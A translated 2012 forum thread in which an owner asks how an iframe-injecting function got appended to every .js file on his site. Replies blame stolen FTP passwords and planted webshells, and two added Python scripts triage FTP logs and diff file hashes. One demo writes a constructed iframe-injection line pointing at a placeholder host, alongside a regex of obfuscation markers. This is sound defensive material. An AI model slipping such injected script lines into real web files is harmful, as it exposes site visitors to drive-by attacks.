Leonid, 2012-04-05 08:27:55
JavaScript

How did the malicious code get on the site?

Dear colleagues,
please help me understand this situation:
There is a shared hosting account with a very simple PHP site running on it. Only registered users, by the way, can add some information about themselves; this information is stored in the database and, of course, displayed on the relevant pages.
The database is completely clean (that is, there is no extraneous data). But the site owner was alarmed: when he opened the site, NOD32 was yelling about a Trojan. Some kind of iframe had appeared in the code of all the pages. Moreover, it got into the pages from the JS files: some dirty function had been appended to the end of every js file, and that function actually rendered the iframe.
I cleaned everything out of the js files and changed all the passwords - for the admin panel and for FTP - although nobody uses the latter... A couple of weeks later - the same misfortune.

Two questions:
1. How can one easily find out who is up to this mischief?
2. How?! How did the infection get into the js files?

Thanks in advance!


10 answer(s)
Chii, 2012-04-05
@Chii

The passwords were changed, but they didn't forget to tell themselves about them...
There are only three options:
1) A hole in the php scripts (or in the access rights) that allows something to be written to the server. (unlikely)
2) A hole in the hosting that allows something to be written to the neighbours. (moderately likely)
3) Someone with admin access to the site has a hole. (for sure)
And finding out exactly what the hole is, is the job of the resource's administrator.

mmjurov, 2012-04-05
@mmjurov

I faced a similar case. I found an exploit in /var/tmp, an ordinary script that, through a vulnerability in the OS, got root access and changed every js file it found in the docroot. If the virus reappears after the passwords are changed, then there is an exploit either on your hosting or on the computer from which you work with the hosting's file structure.

TrueDrago, 2012-04-05
@TrueDrago

We had the same garbage on our test domain yesterday.
Judging by the logs, the virus was simply appended to the end of all the js files over FTP. Since only the password of a user with access to one domain was compromised, it only happened there... Only that user had the password, so everything is pretty obvious)

Niemand, 2012-04-05
@Niemand

It looks very much like a virus that walks through FTP and hangs its tails on the end of certain files. Just changing the passwords is not enough; you need to catch it first. In my memory alone this virus has bypassed Avast, Comodo, Norton and NOD32. Try installing a Kaspersky trial - it helped a friend of mine recently. When you have caught it, then change the passwords and clean the site itself. In general, storing saved passwords in FTP programs is not recommended. Total Commander and FileZilla are especially susceptible.

admin4eg, 2012-04-05
@admin4eg

The most popular ones:
1. Passwords leaked from FTP clients (Total, Far, etc.)
2. A shell or a malicious virus was uploaded to a neighbouring site, and the web server is not configured to isolate projects.
3. The admin-panel password of a popular CMS on a second site was guessed.
4. Something on your site is not being validated, so external code can be included, or a malicious script was uploaded to you.

Puma Thailand, 2012-04-05
@opium

In 99 percent of cases the ftp password is stolen by a trojan on the computer of a developer, an admin, or just someone who has access to the site; first of all, look at the ftp logs.
The other one percent is holes in old engines.
Very rarely, targeted hacking.
Recently I ran into a compromised server on GoDaddy shared hosting: with all access to the site blocked, the virus still keeps appearing; the hoster flatly refuses to hand over the ftp logs; according to the Apache logs there is no break-in through the admin panel; the WordPress engine is the latest; all passwords have been changed; all files have been re-uploaded from a clean copy. Conclusion: compromised hoster.
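
Several replies here (TrueDrago's and opium's above) come down to "read the FTP logs first": the tell-tale sign is one account pushing every .js file in the docroot within a few seconds, often from an IP the account never used before. The script below is an added example, not code from this thread, for triaging such logs. It assumes the hoster's FTP daemon writes the classic xferlog layout (ProFTPD, vsftpd, wu-ftpd); other servers need a different field order. All log lines in it are constructed samples.

```python
"""Triage an xferlog-format FTP transfer log for the mass-rewrite-of-js pattern.

Added example, not code from the original thread. Assumes the xferlog(5)
field layout; the SAMPLE_XFERLOG lines are constructed, not real data.
"""
from collections import defaultdict
from datetime import datetime

# Constructed sample, NOT real data. xferlog fields:
#   date(5 tokens) transfer-time remote-host size filename type special-action
#   direction (i=upload, o=download, d=delete) access-mode username service
#   auth-method auth-uid completion-status
SAMPLE_XFERLOG = """\
Wed Apr  4 10:05:39 2012 1 198.51.100.20 5310 /home/site/public_html/index.php a _ i r siteuser ftp 0 * c
Wed Apr  4 10:06:02 2012 1 198.51.100.20 1842 /home/site/public_html/js/main.js a _ o r siteuser ftp 0 * c
Thu Apr  5 03:12:44 2012 1 203.0.113.7 1842 /home/site/public_html/js/main.js a _ o r siteuser ftp 0 * c
Thu Apr  5 03:12:45 2012 1 203.0.113.7 2411 /home/site/public_html/js/main.js a _ i r siteuser ftp 0 * c
Thu Apr  5 03:12:47 2012 1 203.0.113.7 9930 /home/site/public_html/js/jquery.min.js a _ i r siteuser ftp 0 * c
Thu Apr  5 03:12:49 2012 1 203.0.113.7 640 /home/site/public_html/js/menu.js a _ i r siteuser ftp 0 * c
"""


def parse_xferlog_line(line):
    """Return a dict for one xferlog record, or None for blank/malformed lines."""
    parts = line.split()
    if len(parts) < 14:
        return None
    when = datetime.strptime(" ".join(parts[:5]), "%a %b %d %H:%M:%S %Y")
    return {
        "time": when,
        "ip": parts[6],
        "size": int(parts[7]),
        "path": parts[8],
        "direction": parts[11],
        "user": parts[13],
    }


def find_js_uploads(log_text):
    """All incoming (upload) transfers of *.js files, in log order."""
    records = (parse_xferlog_line(line) for line in log_text.splitlines())
    return [r for r in records
            if r and r["direction"] == "i" and r["path"].lower().endswith(".js")]


def mass_js_uploads(uploads, window_seconds=60, min_files=3):
    """Flag (user, ip) pairs that pushed >= min_files .js files within window_seconds.

    A legitimate deploy trips this too; it is a triage filter, not proof.
    Returns {(user, ip): total .js uploads by that pair}.
    """
    by_session = defaultdict(list)
    for u in uploads:
        by_session[(u["user"], u["ip"])].append(u["time"])
    flagged = {}
    for key, times in by_session.items():
        times.sort()
        for i in range(len(times) - min_files + 1):
            span = (times[i + min_files - 1] - times[i]).total_seconds()
            if span <= window_seconds:
                flagged[key] = len(times)
                break
    return flagged


def ips_per_user(log_text):
    """Source IPs each account transferred from. A new IP on an account whose
    password 'nobody uses' is the first thing to question."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        r = parse_xferlog_line(line)
        if r:
            seen[r["user"]].add(r["ip"])
    return {user: sorted(ips) for user, ips in seen.items()}


if __name__ == "__main__":
    uploads = find_js_uploads(SAMPLE_XFERLOG)
    for u in uploads:
        print(u["time"], u["user"], u["ip"], u["path"])
    print("burst uploads:", mass_js_uploads(uploads))
    print("ips per user:", ips_per_user(SAMPLE_XFERLOG))
```

On the sample, the download-then-upload of the same main.js a second apart, followed by two more .js uploads within five seconds from an IP the account had not used the day before, is exactly the pattern the replies describe; on a real log, compare the flagged IP against the machines of everyone who holds that FTP password.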

ayurganov, 2012-04-05
@ayurganov

What do the logs say? The access log?

1x1, 2012-04-05
@1x1

Recently, at the request of colleagues, I analyzed a similar situation. During the first hack (a leaked FTP password), in addition to editing the scripts, a webshell was added deep inside the CMS, through which they later broke in again. Notably, the webshell was added the day before the scripts were edited, and from a different IP.

Vladislav Shchekoldin, 2012-04-05
@ZiNTeR

Don't you think the virus could have got in by different routes the first and the second time? The first hit was most likely a password stolen from the FTP client.
There was a connection through it. And after that, a php shell was placed on the resource for further work. Most likely your js files were "fixed" from that shell.
You changed the passwords and cleaned up the js, but did you look at the changes in the PHP?
Now you need not only to disinfect the computers (most likely a virus is sitting there), but also to dig through your own site for the "improvements" introduced there...
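
Both 1x1's and Vladislav's replies make the same point: after a rewrite of the js files, the real question is what else changed, in particular whether a new PHP file appeared that nobody put there. The answer is a baseline of file hashes taken from a known-clean copy and compared later. The script below is an added example, not the site's code or anything from this thread; it builds that baseline, reports added, removed and modified files, and for each changed file shows the bytes appended past the old length, with a small heuristic for the kind of tail described in the question. The docroot, file contents and the injected sample line in its demo() are all constructed (the iframe points at a placeholder host), and the markers in SUSPICIOUS_TAIL are my assumption, not a complete signature list.

```python
"""Baseline-and-compare for a web root: find rewritten files and appended tails.

Added example, not the site's own code. Everything in demo() is constructed.
Keep the real manifest somewhere the FTP account cannot write, or an
attacker with that password simply rewrites the baseline too.
"""
import hashlib
import re
import shutil
import tempfile
from pathlib import Path

# Heuristic markers for appended script tails (assumption, tune per site).
# Expect false positives on legitimate minified libraries.
SUSPICIOUS_TAIL = re.compile(
    r"<iframe|document\.write\s*\(|eval\s*\(|unescape\s*\(|String\.fromCharCode",
    re.IGNORECASE,
)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """{relative_path: {"sha256": ..., "size": ...}} for every file under root."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): {"sha256": sha256_file(p), "size": p.stat().st_size}
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def compare_manifest(root, baseline):
    """Classify every path as added, removed or modified relative to the baseline."""
    current = build_manifest(root)
    report = {"added": [], "removed": [], "modified": []}
    for rel in sorted(set(current) | set(baseline)):
        if rel not in baseline:
            report["added"].append(rel)
        elif rel not in current:
            report["removed"].append(rel)
        elif current[rel]["sha256"] != baseline[rel]["sha256"]:
            report["modified"].append(rel)
    return report


def appended_tail(path, baseline_size):
    """Bytes past the old length. Assumes the change was an append (the pattern
    in the question); if the head was rewritten too, this is only a rough cut."""
    data = Path(path).read_bytes()
    return data[baseline_size:] if len(data) > baseline_size else b""


def audit(root, baseline):
    """Diff against the baseline and inspect what was appended to each changed file."""
    report = compare_manifest(root, baseline)
    findings = []
    for status in ("modified", "added"):
        for rel in report[status]:
            old_size = baseline.get(rel, {}).get("size", 0)
            tail = appended_tail(Path(root) / rel, old_size).decode("utf-8", "replace")
            findings.append({
                "path": rel,
                "status": status,
                "suspicious": bool(SUSPICIOUS_TAIL.search(tail)),
                "tail": tail[:160],
            })
    return report, findings


def demo():
    """Constructed docroot: baseline it, then simulate the incident (a tail
    appended to every .js file plus one unexpected new .php file) and audit."""
    root = Path(tempfile.mkdtemp(prefix="docroot_"))
    (root / "js").mkdir()
    (root / "js" / "main.js").write_text("function hello(){return 'hi';}\n")
    (root / "js" / "menu.js").write_text("var menu=[];\n")
    (root / "index.php").write_text("<?php echo 'site'; ?>\n")
    baseline = build_manifest(root)

    # Constructed sample of the kind of tail the question describes; placeholder host.
    injected = "\n;document.write('<iframe src=\"http://invalid.example/x\" width=1 height=1></iframe>');\n"
    for js in (root / "js").glob("*.js"):
        with open(js, "a") as f:
            f.write(injected)
    (root / "images").mkdir()
    (root / "images" / "cache.php").write_text("<?php /* constructed placeholder for an unexpected new file */ ?>\n")

    result = audit(root, baseline)
    shutil.rmtree(root, ignore_errors=True)
    return result


if __name__ == "__main__":
    report, findings = demo()
    print(report)
    for f in findings:
        print(f["status"], f["path"], "SUSPICIOUS" if f["suspicious"] else "", repr(f["tail"]))
```

A new .php file under an images or cache directory shows up as "added" even when its content matches no pattern, which is the point: after a compromise, every added file gets read by a human, and the cleaned site is re-baselined only once that review is done.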

egorinsk, 2012-04-05
@egorinsk

1) They stole the FTP password saved in Total Commander or similar software.
2) There is a vulnerability in the scripts and the virus is inserted through it.
